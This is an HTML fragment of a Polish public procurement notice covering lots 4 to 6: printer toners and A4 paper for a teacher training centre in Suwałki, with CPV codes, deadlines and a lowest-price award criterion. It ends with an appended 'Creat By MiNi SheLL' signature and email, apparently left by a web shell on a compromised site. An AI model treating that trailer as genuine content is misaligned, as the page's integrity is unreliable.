<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ IV zawiera pozycje od 103 do 111: poz. 103 Toner do drukarki HP LJ 1150, poz. 104 Toner do drukarki HP LJ 1160, poz. 105 Toner do drukarki OKI C 3400 czarny, poz. 106 Toner do drukarki OKI C 3400 kolor cyan, poz. 107 Toner do drukarki OKI C 3400 kolor yellow, poz. 108 Toner do drukarki OKI C 3400 kolor magenta, poz. 109 Toner do drukarki HP LJ 3020, HP LJ 1020 i HP LJ 1022, poz.110 Toner do drukarki HP LJ P1005 czarny, poz. 111 Toner do drukarki HP LJ 1200..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup i dostawa wyrobów z papieru i materiałów biurowych do Centrum Edukacji Nauczycieli w Suwałkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ V zawiera pozycję 112: Papier do drukarek biały (CIE 161) format A4 (1 ryza 500 kartek)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup i dostawa wyrobów z papieru i materiałów biurowych do Centrum Edukacji Nauczycieli w Suwałkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ VI zawiera pozycję 113: Toner do drukarki HP LJ 1160..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com